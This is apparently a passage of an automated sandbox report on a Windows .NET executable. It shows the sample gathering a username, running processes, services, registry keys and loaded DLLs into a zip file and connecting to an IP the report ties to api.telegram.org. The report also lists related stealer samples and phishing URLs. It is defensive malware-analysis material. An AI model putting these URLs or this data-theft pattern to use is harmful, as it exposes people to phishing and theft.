          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          19:08:55API Interceptor43x Sleep call for process: n0PDCyrFnf.exe modified
          19:08:57API Interceptor1x Sleep call for process: WMIC.exe modified

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          149.154.167.220client2.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
            https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlGet hashmaliciousUnknownBrowse
              LEK1JCI81P.exeGet hashmaliciousRedLine, Snake Keylogger, StormKitty, SugarDump, VIP Keylogger, XWormBrowse
                Invoice-2238562.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                  INQUIRY.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                      SWIFT COPIES.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                        Client.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                          i3F8zuP3u9.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                            Detailed Itinerary.exeGet hashmaliciousPureLog Stealer, XWormBrowse

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              api.telegram.orgclient2.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                              • 149.154.167.220
                              https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlGet hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              LEK1JCI81P.exeGet hashmaliciousRedLine, Snake Keylogger, StormKitty, SugarDump, VIP Keylogger, XWormBrowse
                              • 149.154.167.220
                              Invoice-2238562.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 149.154.167.220
                              INQUIRY.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 149.154.167.220
                              QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 149.154.167.220
                              SWIFT COPIES.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                              • 149.154.167.220
                              Client.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                              • 149.154.167.220
                              i3F8zuP3u9.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 149.154.167.220
                              Detailed Itinerary.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                              • 149.154.167.220

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              TELEGRAMRUclient2.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                              • 149.154.167.220
                              https://telegrern.icu/?8a18ab92c44a9607e8cddc31d16d5729Get hashmaliciousTelegram PhisherBrowse
                              • 149.154.167.99
                              https://www.askozvar.sk/wp-admin/maint/connexion.idnot.fr-user-auth-dologin/Document-Confidentiel-pdf.htmlGet hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              LEK1JCI81P.exeGet hashmaliciousRedLine, Snake Keylogger, StormKitty, SugarDump, VIP Keylogger, XWormBrowse
                              • 149.154.167.220
                              d3d9x.dllGet hashmaliciousXehook StealerBrowse
                              • 149.154.167.99
                              400000.MSBuild.exeGet hashmaliciousXehook StealerBrowse
                              • 149.154.167.99
                              400000.MSBuild.exeGet hashmaliciousXehook StealerBrowse
                              • 149.154.167.99
                              Invoice-2238562.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 149.154.167.220
                              INQUIRY.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 149.154.167.220
                              QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 149.154.167.220

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              74954a0c86284d0d6e1c4efefe92b521SecuriteInfo.com.Trojan.Win64.Krypt.13435.32435.exeGet hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              slmgr.vbsGet hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              scan_9374673_Medoc.pdf.exeGet hashmaliciousDBatLoader, TVratBrowse
                              • 149.154.167.220
                              scan_9374673_Medoc.pdf.exeGet hashmaliciousDBatLoader, TVratBrowse
                              • 149.154.167.220
                              i.batGet hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              Archive.zipGet hashmaliciousGandcrabBrowse
                              • 149.154.167.220
                              attachment.txt.lnkGet hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              Doc1.docmGet hashmaliciousPython StealerBrowse
                              • 149.154.167.220
                              YENB0G9CNCEL.batGet hashmaliciousAsyncRAT, DcRatBrowse
                              • 149.154.167.220
                              Eksik#U0130slemBildirimi.batGet hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              3b5074b1b5d032e5620f69f9f700ff0ehttps://uppholldlgins.mystrikingly.com/Get hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              http://www.chacararecantodosol.com.br/wp-admin/js/milissa/swisssa2024/swisscom/index2.phpGet hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              https://bfb76b24ef4f39994db41677dff3eb5ffaa8600730bf804477ddba0f4e.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                              • 149.154.167.220
                              http://alfdmy-acc.click/icloud2022-esp.php/Get hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              https://multicoinsystemnode.firebaseapp.com/Get hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              https://66d2795a9886f088ed2f8c66--loquacious-pixie-9e563f.netlify.app/Get hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              https://wh-whatsapp.icu/Get hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              http://axn-one.vercel.app/Get hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              http://www.tiktw.com/Get hashmaliciousUnknownBrowse
                              • 149.154.167.220
                              https://i-claim7.vercel.app/Get hashmaliciousUnknownBrowse
                              • 149.154.167.220

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\n0PDCyrFnf.exe.log

                              Download File
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:CSV text
                              Category:dropped
                              Size (bytes):5252
                              Entropy (8bit):5.360852309168774
                              Encrypted:false
                              SSDEEP:96:iqbYqGSI6ozajtIzQ0cxYsAmSvBjwQYrKxmDRtzHeqKkCq10tpDuqDqWiNLWPzNW:iqbYqGcRIzQ0JyZtzHeqKkCq10tpDuqi
                              MD5:E713B4067A4128844D005C0A2D8B8867
                              SHA1:57D0A72A1614181105A33B18DE7A3AB8F136B1A0
                              SHA-256:C3619BC0C9DA8421B80D4E97FBCFAB173FEBF2F555F459715761A1BCEFE7C51D
                              SHA-512:467543C956DB8F89FCBB2F4A76D87018635B16B1A576453FF528D8B2341A4044F86EEBB0DF4169E0454F7FCDCD8843FB256ACEB4522974F18D7D2ED868E8EC92
                              Malicious:true
                              Reputation:low
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\27947b366dfb4feddb2be787d72ca90d\System.Management.Automation.ni.dll",0..3,"Microsoft.PowerShell.Commands.Diagnostics, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\37a5ed6e6a6a48d370ee34b13c3e2b37\Microsoft.PowerShell.Commands.Diagnostics.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5f5ahar5.bbo.ps1

                              Download File
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bocl3hz4.ptz.ps1

                              Download File
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkueo54n.2mf.psm1

                              Download File
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uowp1cpy.icm.ps1

                              Download File
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vlddpbgj.o5m.psm1

                              Download File
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wmwcsfiw.qjm.psm1

                              Download File
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\database.zip

                              Download File
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                              Category:dropped
                              Size (bytes):9170
                              Entropy (8bit):7.888394580457143
                              Encrypted:false
                              SSDEEP:192:ghk7p49wRsOYwUCQYuH08JFCAgo2WWBhKXXyLLtvlPnQgsQFS:ghk7pgc7iLYujHCRDPKMtJQrZ
                              MD5:27F4E493ECDCC358F1A540B86AEBD0F3
                              SHA1:7D1726E3FC3A10291EC27C3CBE67B951B7AA5D71
                              SHA-256:4A82BB35D4A7664FA0EF0002B097FC0F6CAD6FF4AE4785C0E296E06B78A42FC9
                              SHA-512:ED1587F11ADEAA2753099E32CD94D091C47A53154B8AAAC72E456D5888000BDB0CB9BB9E014EA86ECB8878F18E9885B4FFC3F06334B471FA8823E681EC93946B
                              Malicious:false
                              Preview:PK........!..Y..5$.....!......database\DLLs_in_memory.txt.Y.r.J...}.T.f.bU3....;....c....)UQ.Q.+.......^.#.+l...m.. g.e.............O..`P...doN...7..+.....x...........l.........yzs3.|..$...]..\...~....b...`.O?\..a.}m..N..]86._?...N.....9..o....[.U..o..8...EQ.W.......".......[SB.......na^;Q...t}..=...EtW...^......]Is..=..u....v.!40Y.t......i*.v.`.......ib...i..&.~...U....U..&-..C..W.........~w...c8..k@.:)..U...#!.u.&K.q..f..`.a..j..E^.E....*).I...'.z.u.;...c8xQ.[..#-6:7.8.o.Ej_..?._.A......1.W.w.YU........J...9x.~\...z..?E...H.M.mP....{..:.bVa.nx.w..9..=8.8.fEy.0..X.Wr.9d4.|4R3.[.n..p.....$,M...']'.l.Lm....22..O.]....i...)w...N.-WG...!..E.&a..L.sv....d..N....Y5.....Q...q)..{7..i..C..E.#JuCF.s^I.G....d.$...N.'s......<.....=....>.92!E..VpVX..C.&..~...t.>...P..v....b..d.i/..<~.....T.da..VE.....F.M&..z..w...$.<eN.......27. B.(pm....x.Z.....<....S[Oq...?*.=.......@r.,...66..n.g.a...:$;.u..<c5..$..Xni(@..~...Jq-#M#....j'Y;.R...}.PI.51."J.A...a.

                              C:\Users\user\AppData\Local\Temp\database\DLLs_in_memory.txt

                              Download File
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8605
                              Entropy (8bit):5.456254145784573
                              Encrypted:false
                              SSDEEP:192:Z7i4olBumXQ0sHbc/XpHk1+66WYhtrgpa/ElHLEpDPM:U3BJXQ0sHbc/XpEA9dDPM
                              MD5:E2A7D9C11D0F98D8D1C50E9435CBD602
                              SHA1:D38BF8ED3C5B77DACA107C9BB7D7DA18062CFDE3
                              SHA-256:8669C6ED6D515A28D7324DD446E2F500A8FC9BE06889F2B05144FC88E5AD257A
                              SHA-512:FCEEABD40271C81CD38909536F5DB26BBB52BA5B9247454329AE29304612681DD654A19E1966FD53649AD8ACD17D21742D175D59E4BC89ACFF0E005275516484
                              Malicious:false
                              Preview:.C:\Program Files (x86)\kRguKqyYZYYjhKvuEmxiGSRqKcMNTnlYYxDqUPiEDuHsjaWMmbcjzlheyTAdPQeyfuQUJQxAwzC\IDABkbgaFzQFTLFSnWHp.exe..C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll..C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSVCP140.dll..C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\VCRUNTIME140.dll..C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\VCRUNTIME140_1.dll..C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\amd64\FileSyncShell64.dll..C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ApiClient.dll..C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVCatalog.dll..C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVFILESYSTEMMETADATA.dll..C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll..C:\Program Files\Co

                              C:\Users\user\AppData\Local\Temp\database\registry_folders.txt

                              Download File
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):562
                              Entropy (8bit):4.403075456536458
                              Encrypted:false
                              SSDEEP:12:tE8EpIbzq1BvY0sF9VM32XM3vKJmpI1CgnzY8P32Xt:feIbzq1JY0snVM32XhuIcgzY632Xt
                              MD5:A445EBEFFA955C3AA1DB879E39006161
                              SHA1:90569BD68F304E84961B7E3B5E37013036BCA366
                              SHA-256:6A9EFE73C7ECCD1EC26BA81F15130100FB1B9FDA36E5EC87C70E71C6CC50ED82
                              SHA-512:7943F3C6C6BD307A0B33A6D21C94520520BE4DBE817069D5ACC4236195404BE7BBD492DAB3E9A8BF7EAAE158FFAAA338D803E7154625FA1AE4E1A560F404A0D3
                              Malicious:false
                              Preview:...----------------------------------------..HKLM KEYS..----------------------------------------..7-Zip..Adobe..Clients..CVSM..DefaultUserEnvironment..Google..Intel..Microsoft..Mozilla..mozilla.org..MozillaPlugins..ODBC..OEM..OpenSSH..Partner..Policies..RegisteredApplications..Windows..WOW6432Node....----------------------------------------..HKCU KEYS..----------------------------------------..7-Zip..Adobe..AppDataLow..Chromium..DownloadManager..GNU..Google..IM Providers..Microsoft..Mozilla..Netscape..ODBC..Policies..RegisteredApplications..Wow6432Node..

                              C:\Users\user\AppData\Local\Temp\database\running-applications.txt

                              Download File
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):112254
                              Entropy (8bit):2.6155817173904254
                              Encrypted:false
                              SSDEEP:192:wKpFFULMaD4WTG9+PTCIo9/k/sFwz3J9xOfvcvYIRsONLF5PlLmcGHLJzfeUdQhW:wKpFFUMt
                              MD5:9E82EBECCB2828348BA267FBF596CE45
                              SHA1:CD979437908ABBE0D7315ACEC234E0BC6C73911E
                              SHA-256:195054848477BA1533DE19C0F84E2DBEF19BA8206A79A9B546BC24059C05820F
                              SHA-512:96EBE18285AE1C283AC1FDE873316481C3364860FEFAB62179B0C6062038F0A8601277F1795DC851FEC13543FD990BEEEB1CFA6584103D4403EEC7AC05E07194
                              Malicious:false
                              Preview:......N.a.m.e. . . . . . . . . . . . . . . . . . . . . . . . .D.e.s.c.r.i.p.t.i.o.n. . . . . . . . . . . . . . . . . .P.r.o.c.e.s.s.I.d. .T.h.r.e.a.d.C.o.u.n.t. .H.a.n.d.l.e.s. .P.a.t.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....-.-.-.-. . . . . . . . . . . . . . . . . . . . . . . . .-.-.-.-.-.-.-.-.-.-.-. . . . . . . . . . . . . . . . . .-.-.-.-.-.-.-.-.-. .-.-.-.-.-.-.-.-.-.-.-. .-.-.-.-.-.-.-. .-.-.-.-. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....S.y.s.t.e.m. .I.d.l.e. .P.r.o.c.e.s.s. . . . . . . . . .S.y.s.t.e.m. .I.d.l.e. .P.r.o.c.e.s.s. . . . . . . . . . . . . . . . . .0. . . . . . . . . . . .2. . . . . . . .0. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....S.y.s.t.e.m. . . . . . . . . . . . . . . . . . . . . . .S.y.s.t.e.m. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4. . . . . . . . . .1.5.5. . . . .3.1.8.0. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....R.e.g.i.s.t.r.y. .

                              C:\Users\user\AppData\Local\Temp\database\running-services.txt

                              Download File
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):27830
                              Entropy (8bit):2.6278553414981185
                              Encrypted:false
                              SSDEEP:96:wZ5Dvpz93n/Gt6zMRTH1EU3MZuGbYgHRZFG7RwDLD3R7+M7E3Olw2xmAP3b79gHy:wbCOyTihHbZow/d9Dwbk2RCtz9vbx
                              MD5:1BCF4D65689D48623E3478E42EEB39AE
                              SHA1:B55DF6B67B15BDA86EFE4B66458BC4DA51C775A7
                              SHA-256:D0E354616A467D151AAC3E78375B801E4169753D780D6F0DEBEC001EA815A451
                              SHA-512:86365D0807A437D4FC2AF8839ABA81C654DCA34FED0D042B2780A2AC2A5B3FAC91ED30DE09B517BED716A4E5E71ACB913A4D8FAC998AD5F58B665DCB8AF6DC25
                              Malicious:false
                              Preview:......N.a.m.e. . . . . . . . . . . . . . . . . . . . . .D.i.s.p.l.a.y.N.a.m.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .P.a.t.h.N.a.m.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....-.-.-.-. . . . . . . . . . . . . . . . . . . . . .-.-.-.-.-.-.-.-.-.-.-. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-.-.-.-.-.-.-.-. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....A.p.p.i.n.f.o. . . . . . . . . . . . . . . . . . .A.p.p.l.i.c.a.t.i.o.n. .I.n.f.o.r.m.a.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . .C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.s.v.c.h.o.s.t...e.x.e. .-.k. .n.e.t.s.v.c.s. .-.p. . . . .....A.p.p.X.S.v.c. . . . . . . . . . . . . . . . . . .A.p.p.X. .D.e.p.l.o.y.m.e.n.t. .S.e.r.v.i.c.e. .(.A.p.p.X.S.V.C.). . . . . . . . . . . . . .C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.s.v.c.h.o.s.t...e.x.e. .-.k. .w.s.a.p.p.x. .-.p. . . . . .....A.u.d.i.o.E.n.d.p.

                              C:\Users\user\AppData\Local\Temp\database\username.txt

                              Download File
                              Process:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):16
                              Entropy (8bit):2.771782221599798
                              Encrypted:false
                              SSDEEP:3:QPQlSLlvl:QIql9
                              MD5:0DB133DF4C9709771A05F0E38D3611A3
                              SHA1:710AA2FFE016FF1466BC38327BC6A34BECDE2296
                              SHA-256:C46346422C83B8FD2CD54FEAAA4049AFB67BAA3756F9C75D5F6048FB4A6B2AE8
                              SHA-512:E9306FF84570B5A912522BD2C88CC61B54C1EDEA600FA840F86FC61C74BC5EC7DF04C35A2A597CC0971D9981F8C05F20F99295E75423374E70154A9D9456BDF9
                              Malicious:false
                              Preview:..j.o.n.e.s.....

                              Static File Info

                              General

                              File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.350617040103966
                              TrID:
                              • Win64 Executable GUI (202006/5) 92.65%
                              • Win64 Executable (generic) (12005/4) 5.51%
                              • Generic Win/DOS Executable (2004/3) 0.92%
                              • DOS Executable Generic (2002/1) 0.92%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:n0PDCyrFnf.exe
                              File size:367'616 bytes
                              MD5:88e5d9d97d0e3c83e74926986d6e5ef6
                              SHA1:37c8bcfde800dea135577b3254b11c6fe639dc21
                              SHA256:3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279
                              SHA512:e4756404059c4daf2e287baa18b81564f5d616fe13e646109a40d7c3a66c11016174dd39a0639d7656e3beb8c4e9de4ab1cde77c470bed873bdd09b979943ece
                              SSDEEP:6144:+3AtVSBNhoeDUrsi+VmwnJ5D/ArmtPk8Rs9LzIPZ3CpUiS:+QL8LoTrsLFnJ5DY8by5zE3Cy
                              TLSH:9C749E99B2908F40C3983E71D0A3456953A1A4AB73B7FB4D2ED822956D077F88D4E3C7
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...M..f................................. ....@...... ....................................@...@......@............... .....

                              File Icon

                              Icon Hash:90cececece8e8eb0

                              Static PE Info

                              General

                              Entrypoint:0x400000
                              Entrypoint Section:
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66D3A04D [Sat Aug 31 22:59:25 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:

                              Entrypoint Preview

                              Instruction
                              dec ebp
                              pop edx
                              nop
                              add byte ptr [ebx], al
                              add byte ptr [eax], al
                              add byte ptr [eax+eax], al
                              add byte ptr [eax], al

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x5c0000x10.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x20000x596800x59800cc72d35ce199acefeeacf464acf3d2bbFalse0.7446834628142458data7.361258356562657IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rsrc0x5c0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Sep 1, 2024 01:08:59.088182926 CEST49730443192.168.2.4149.154.167.220
                              Sep 1, 2024 01:08:59.088221073 CEST44349730149.154.167.220192.168.2.4
                              Sep 1, 2024 01:08:59.088296890 CEST49730443192.168.2.4149.154.167.220
                              Sep 1, 2024 01:08:59.096311092 CEST49730443192.168.2.4149.154.167.220
